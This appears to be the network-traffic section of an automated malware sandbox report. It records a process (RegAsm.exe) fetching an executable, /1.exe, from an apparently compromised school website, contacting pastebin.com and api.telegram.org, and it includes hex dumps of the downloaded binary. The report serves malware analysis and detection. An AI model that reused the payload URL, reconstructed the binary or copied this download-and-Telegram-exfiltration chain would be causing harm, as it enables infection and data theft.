                                                    Sep 8, 2024 14:56:45.400178909 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.400206089 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.400223970 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.400964022 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.400978088 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.401019096 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.401024103 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.401034117 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.401048899 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.401058912 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.401062965 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.401091099 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.401120901 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.401891947 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.401905060 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.401945114 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.401948929 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.401974916 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.401989937 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.518913984 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.518929958 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.519155025 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.519176006 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.519246101 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.520416975 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.520430088 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.520493984 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.520500898 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.520544052 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.521258116 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.521271944 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.521327972 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.521333933 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.521383047 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.522320032 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.522336006 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.522387981 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.522393942 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.522435904 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.523703098 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.523716927 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.523773909 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.523778915 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.523818016 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.524142981 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.524182081 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.524204969 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.524204969 CEST44349708194.163.35.141192.168.2.7
                                                    Sep 8, 2024 14:56:45.524249077 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.527602911 CEST49708443192.168.2.7194.163.35.141
                                                    Sep 8, 2024 14:56:45.622347116 CEST497077880192.168.2.75.42.92.222
                                                    Sep 8, 2024 14:56:45.627204895 CEST7880497075.42.92.222192.168.2.7
                                                    Sep 8, 2024 14:56:45.851917982 CEST7880497075.42.92.222192.168.2.7
                                                    Sep 8, 2024 14:56:45.871201038 CEST497077880192.168.2.75.42.92.222
                                                    Sep 8, 2024 14:56:51.097989082 CEST49709443192.168.2.7104.20.4.235
                                                    Sep 8, 2024 14:56:51.098037004 CEST44349709104.20.4.235192.168.2.7
                                                    Sep 8, 2024 14:56:51.098161936 CEST49709443192.168.2.7104.20.4.235
                                                    Sep 8, 2024 14:56:51.102700949 CEST49709443192.168.2.7104.20.4.235
                                                    Sep 8, 2024 14:56:51.102730989 CEST44349709104.20.4.235192.168.2.7
                                                    Sep 8, 2024 14:56:51.592017889 CEST44349709104.20.4.235192.168.2.7
                                                    Sep 8, 2024 14:56:51.592324972 CEST49709443192.168.2.7104.20.4.235
                                                    Sep 8, 2024 14:56:51.596528053 CEST49709443192.168.2.7104.20.4.235
                                                    Sep 8, 2024 14:56:51.596559048 CEST44349709104.20.4.235192.168.2.7
                                                    Sep 8, 2024 14:56:51.596801043 CEST44349709104.20.4.235192.168.2.7
                                                    Sep 8, 2024 14:56:51.649022102 CEST49709443192.168.2.7104.20.4.235
                                                    Sep 8, 2024 14:56:51.692553043 CEST44349709104.20.4.235192.168.2.7
                                                    Sep 8, 2024 14:56:52.146807909 CEST44349709104.20.4.235192.168.2.7
                                                    Sep 8, 2024 14:56:52.146898031 CEST44349709104.20.4.235192.168.2.7
                                                    Sep 8, 2024 14:56:52.147176981 CEST49709443192.168.2.7104.20.4.235
                                                    Sep 8, 2024 14:56:52.151357889 CEST49709443192.168.2.7104.20.4.235
                                                    Sep 8, 2024 14:56:52.160600901 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:52.160661936 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:52.160739899 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:52.161077976 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:52.161102057 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:52.798455000 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:52.798618078 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:52.800923109 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:52.800940037 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:52.801178932 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:52.802757025 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:52.844502926 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.105458021 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.108386993 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.108405113 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.109627008 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.109632015 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.109700918 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.109704971 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.109774113 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.109776974 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.109826088 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.109829903 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.109927893 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.109930992 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.110009909 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.110013962 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.110066891 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.110069990 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.110161066 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.110174894 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.110227108 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.110230923 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.110268116 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.110280991 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.110332012 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.110342026 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.110434055 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.110445023 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.110505104 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.110516071 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.110569954 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.110582113 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.110624075 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.110634089 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.110694885 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.110704899 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.110800028 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.110810995 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.110857010 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.110867023 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.110913038 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.110924006 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.110990047 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.111000061 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.111084938 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.111097097 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.111143112 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.111152887 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.111197948 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.111207008 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.111259937 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.111274004 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.111315966 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.111325026 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.111390114 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.111399889 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.111459970 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.111470938 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.111521006 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.111531019 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.111571074 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.111581087 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.111649036 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.111656904 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.111738920 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.111747980 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.111787081 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.111795902 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.111862898 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.111953974 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.112011909 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.112071037 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.112135887 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.120872021 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.121042013 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.121054888 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.121115923 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.121167898 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.121226072 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.121277094 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.121341944 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.125938892 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.126107931 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.126122952 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.126228094 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.126296043 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.126349926 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.126408100 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.126470089 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.126749992 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.126857042 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.126873016 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.126914024 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.126925945 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.126979113 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.131561041 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:53.131608009 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:53.133671999 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:54.315525055 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:54.315618038 CEST44349710149.154.167.220192.168.2.7
                                                    Sep 8, 2024 14:56:54.315681934 CEST49710443192.168.2.7149.154.167.220
                                                    Sep 8, 2024 14:56:54.316231966 CEST49710443192.168.2.7149.154.167.220

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 8, 2024 14:56:42.139744997 CEST5759653192.168.2.71.1.1.1
                                                    Sep 8, 2024 14:56:42.433053017 CEST53575961.1.1.1192.168.2.7
                                                    Sep 8, 2024 14:56:51.061122894 CEST5406353192.168.2.71.1.1.1
                                                    Sep 8, 2024 14:56:51.091706991 CEST53540631.1.1.1192.168.2.7
                                                    Sep 8, 2024 14:56:52.153486013 CEST5787253192.168.2.71.1.1.1
                                                    Sep 8, 2024 14:56:52.160047054 CEST53578721.1.1.1192.168.2.7

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Sep 8, 2024 14:56:42.139744997 CEST192.168.2.71.1.1.10x6fc2Standard query (0)smkn2sumbawabesar.sch.idA (IP address)IN (0x0001)false
                                                    Sep 8, 2024 14:56:51.061122894 CEST192.168.2.71.1.1.10x92c9Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                    Sep 8, 2024 14:56:52.153486013 CEST192.168.2.71.1.1.10x7b54Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Sep 8, 2024 14:56:42.433053017 CEST1.1.1.1192.168.2.70x6fc2No error (0)smkn2sumbawabesar.sch.id194.163.35.141A (IP address)IN (0x0001)false
                                                    Sep 8, 2024 14:56:51.091706991 CEST1.1.1.1192.168.2.70x92c9No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                    Sep 8, 2024 14:56:51.091706991 CEST1.1.1.1192.168.2.70x92c9No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                    Sep 8, 2024 14:56:51.091706991 CEST1.1.1.1192.168.2.70x92c9No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                    Sep 8, 2024 14:56:52.160047054 CEST1.1.1.1192.168.2.70x7b54No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • smkn2sumbawabesar.sch.id
                                                    • pastebin.com
                                                    • api.telegram.org

                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.749708194.163.35.1414431264C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-09-08 12:56:43 UTC79OUTGET /1.exe HTTP/1.1
                                                    Host: smkn2sumbawabesar.sch.id
                                                    Connection: Keep-Alive
                                                    2024-09-08 12:56:44 UTC358INHTTP/1.1 200 OK
                                                    Connection: close
                                                    content-type: application/x-executable
                                                    last-modified: Fri, 06 Sep 2024 02:18:04 GMT
                                                    etag: "6a800-66da665c-809658ca37269c0c;;;"
                                                    accept-ranges: bytes
                                                    content-length: 436224
                                                    date: Sun, 08 Sep 2024 12:56:44 GMT
                                                    server: LiteSpeed
                                                    platform: hostinger
                                                    panel: hpanel
                                                    content-security-policy: upgrade-insecure-requests
                                                    2024-09-08 12:56:44 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6f f1 1d ab 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 9e 06 00 00 08 00 00 00 00 00 00 0e bc 06 00 00 20 00 00 00 c0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 07 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELo"0 @ `
                                                    2024-09-08 12:56:44 UTC16384INData Raw: 50 20 00 00 00 00 86 18 bd 14 26 00 34 00 ac 21 00 00 00 00 96 00 f7 33 4e 00 34 00 50 20 00 00 00 00 86 18 bd 14 26 00 34 00 40 3c 00 00 00 00 96 00 26 06 62 01 34 00 50 20 00 00 00 00 86 18 bd 14 26 00 35 00 50 20 00 00 00 00 86 18 bd 14 26 00 35 00 78 3c 00 00 00 00 83 00 20 00 26 00 35 00 70 3d 00 00 00 00 e1 01 32 1a 26 00 35 00 c2 21 00 00 00 00 e1 01 77 08 5a 00 35 00 38 3e 00 00 00 00 96 00 3f 22 5e 01 36 00 b4 3e 00 00 00 00 96 00 5a 38 5e 01 36 00 50 20 00 00 00 00 86 18 bd 14 26 00 36 00 50 20 00 00 00 00 86 18 bd 14 26 00 36 00 d0 21 00 00 00 00 83 00 49 00 26 00 36 00 dd 21 00 00 00 00 96 08 88 0d 5e 01 36 00 e5 21 00 00 00 00 96 08 91 14 5e 01 36 00 ed 21 00 00 00 00 96 08 4f 07 5e 01 36 00 f6 21 00 00 00 00 96 08 26 0d 7d 01 36 00 fd 21 00
                                                    Data Ascii: P &4!3N4P &4@<&b4P &5P &5x< &5p=2&5!wZ58>?"^6>Z8^6P &6P &6!I&6!^6!^6!O^6!&}6!
                                                    2024-09-08 12:56:44 UTC16384INData Raw: b8 e3 83 9e 00 e3 82 8c e3 82 b5 e3 80 83 e3 83 87 4b e3 81 81 e3 81 b0 e3 83 a3 e3 82 a6 e3 82 87 e3 83 bf e3 82 a3 e3 83 95 e3 83 b9 e3 83 9e 00 e3 83 b6 e3 82 94 77 e3 82 91 e3 83 8a e3 82 a8 e3 83 9c e3 83 9e e3 83 a7 76 e3 82 a6 e3 82 a3 73 e3 82 8d e3 81 9f 00 e3 83 bd e3 80 92 e3 82 ba 64 e3 82 92 e3 81 ae 5a e3 82 bd 46 e3 83 87 e3 82 b4 e3 81 98 e3 81 b7 e3 81 af e3 82 9f 00 e3 81 b1 50 e3 83 9d e3 83 9b e3 81 be e3 81 b9 5a e3 82 a1 e3 81 84 e3 83 b8 e3 82 9c e3 83 ae e3 81 9a e3 81 b4 e3 82 a0 00 78 e3 81 ab e3 83 88 65 e3 83 b8 79 e3 81 b6 e3 83 bb e3 82 82 e3 81 b0 e3 83 99 e3 83 a0 55 44 78 e3 83 83 e3 83 b4 e3 82 a0 00 49 e3 81 a3 e3 81 ab e3 82 aa 56 e3 81 92 e3 82 bd 77 62 e3 82 b0 6e 5a e3 80 92 e3 82 9f e3 82 a7 e3 82 84 50 e3 83 a0 00
                                                    Data Ascii: KwvsdZFPZxeyUDxIVwbnZP
                                                    2024-09-08 12:56:44 UTC16384INData Raw: 00 02 00 37 00 3c 00 3e 00 06 00 2f 00 1e 00 20 00 47 00 14 00 5e 00 64 00 2d 00 6b 00 0b 00 1f 00 10 00 76 00 25 00 33 00 3e 00 54 00 35 00 22 00 4d 00 7f 00 52 00 25 00 01 00 1a 00 3b 00 12 00 26 00 03 00 20 00 1e 00 16 00 2d 00 4d 00 29 00 18 00 0e 00 0c 00 12 00 3c 00 37 00 19 00 14 00 51 00 37 00 02 00 14 00 76 00 14 00 02 00 3f 00 46 00 79 00 40 00 05 00 5b 00 04 00 15 00 36 00 2e 00 7c 00 06 00 0f 00 1a 00 05 00 2a 00 30 00 24 00 2e 00 60 00 0b 00 16 00 30 00 29 00 2f 00 2e 00 2e 00 1b 00 1e 00 0e 00 0c 00 2c 00 2e 00 1a 00 25 00 45 00 62 00 28 00 18 00 20 00 15 00 15 00 04 00 38 00 1f 00 38 00 05 00 2d 00 2a 00 1c 00 04 00 6d 00 16 00 38 00 33 00 1e 00 20 00 29 00 18 00 5d 00 2f 00 31 00 21 00 00 00 07 00 0f 00 0e 00 57 00 28 00 09 00 2e 00 40 00
                                                    Data Ascii: 7<>/ G^d-kv%3>T5"MR%;& -M)<7Q7v?Fy@[6.|*0$.`0)/..,.%Eb( 88-*m83 )]/1!W(.@
                                                    2024-09-08 12:56:44 UTC16384INData Raw: 00 17 00 0e 00 0a 00 20 00 32 00 0f 00 1c 00 33 00 12 00 15 00 4e 00 00 00 2a 00 65 00 35 00 7f 00 2e 00 15 00 17 00 45 00 13 00 35 00 3a 00 76 00 14 00 7b 00 7c 00 10 00 57 00 16 00 44 00 10 00 05 00 21 00 13 00 47 00 08 00 1f 00 2b 00 08 00 47 00 06 00 6f 00 35 00 38 00 39 00 1d 00 37 00 09 00 15 00 20 00 26 00 06 00 1b 00 4b 00 07 00 30 00 02 00 58 00 60 00 2c 00 20 00 47 00 72 00 14 00 07 00 26 00 33 00 18 00 3f 00 22 00 27 00 47 00 1a 00 5e 00 37 00 2a 00 28 00 36 00 7e 00 5a 00 76 00 1b 00 06 00 77 00 26 00 09 00 04 00 09 00 7f 00 7d 00 69 00 04 00 35 00 21 00 22 00 0a 00 27 00 1d 00 15 00 32 00 0c 00 4b 00 75 00 14 00 2f 00 7e 00 3c 00 36 00 01 00 19 00 32 00 5a 00 07 00 23 00 1e 00 24 00 30 00 4b 00 2a 00 42 00 2e 00 41 00 2d 00 5d 00 13 00 27 00
                                                    Data Ascii: 23N*e5.E5:v{|WD!G+Go5897 &K0X`, Gr&3?"'G^7*(6~Zvw&}i5!"'2Ku/~<62Z#$0K*B.A-]'
                                                    2024-09-08 12:56:44 UTC16384INData Raw: 00 15 00 27 00 38 00 3b 00 0a 00 56 00 12 00 37 00 05 00 2d 00 6b 00 22 00 16 00 6a 00 45 00 2e 00 1f 00 7c 00 3b 00 4e 00 08 00 33 00 49 00 09 00 2c 00 0b 00 0b 00 1f 00 05 00 3d 00 36 00 27 00 32 00 09 00 39 00 34 00 27 00 56 00 0b 00 12 00 44 00 15 00 0f 00 05 00 34 00 65 00 18 00 2b 00 26 00 0c 00 2f 00 0a 00 71 00 23 00 1b 00 29 00 0f 00 09 00 0d 00 64 00 57 00 33 00 23 00 72 00 1b 00 15 00 39 00 14 00 0c 00 32 00 3b 00 26 00 3f 00 28 00 4f 00 39 00 1b 00 31 00 37 00 0e 00 2f 00 02 00 21 00 0f 00 10 00 26 00 04 00 70 00 47 00 23 00 7e 00 10 00 25 00 0a 00 24 00 77 00 21 00 09 00 3d 00 4f 00 0e 00 34 00 2f 00 28 00 4d 00 0a 00 4b 00 62 00 2a 00 3b 00 10 00 7e 00 57 00 25 00 23 00 30 00 3b 00 2f 00 0c 00 01 00 3d 00 30 00 0a 00 00 00 3d 00 0b 00 38 00
                                                    Data Ascii: '8;V7-k"jE.|;N3I,=6'294'VD4e+&/q#)dW3#r92;&?(O917/!&pG#~%$w!=O4/(MKb*;~W%#0;/=0=8
                                                    2024-09-08 12:56:45 UTC16384INData Raw: 00 26 00 20 00 5d 00 22 00 06 00 2f 00 4b 00 0e 00 1d 00 79 00 72 00 09 00 57 00 60 00 0f 00 75 00 33 00 29 00 58 00 47 00 2a 00 56 00 28 00 0d 00 20 00 2d 00 4b 00 25 00 2a 00 6b 00 06 00 2f 00 09 00 02 00 5a 00 24 00 29 00 3f 00 3d 00 34 00 46 00 2d 00 0c 00 07 00 09 00 25 00 11 00 72 00 31 00 33 00 58 00 27 00 16 00 0e 00 19 00 7a 00 12 00 36 00 4e 00 02 00 5c 00 65 00 46 00 01 00 0c 00 7e 00 53 00 3d 00 75 00 12 00 20 00 00 00 2c 00 1b 00 5f 00 27 00 18 00 17 00 07 00 0e 00 35 00 1e 00 5c 00 4f 00 3e 00 54 00 28 00 09 00 3f 00 15 00 78 00 07 00 2a 00 16 00 1b 00 0a 00 50 00 0c 00 5d 00 04 00 13 00 25 00 40 00 09 00 30 00 35 00 73 00 08 00 59 00 63 00 39 00 02 00 14 00 03 00 32 00 37 00 75 00 01 00 4b 00 3f 00 46 00 74 00 08 00 16 00 0d 00 67 00 4b 00
                                                    Data Ascii: & ]"/KyrW`u3)XG*V( -K%*k/Z$)?=4F-%r13X'z6N\eF~S=u ,_'5\O>T(?x*P]%@05sYc927uK?FtgK
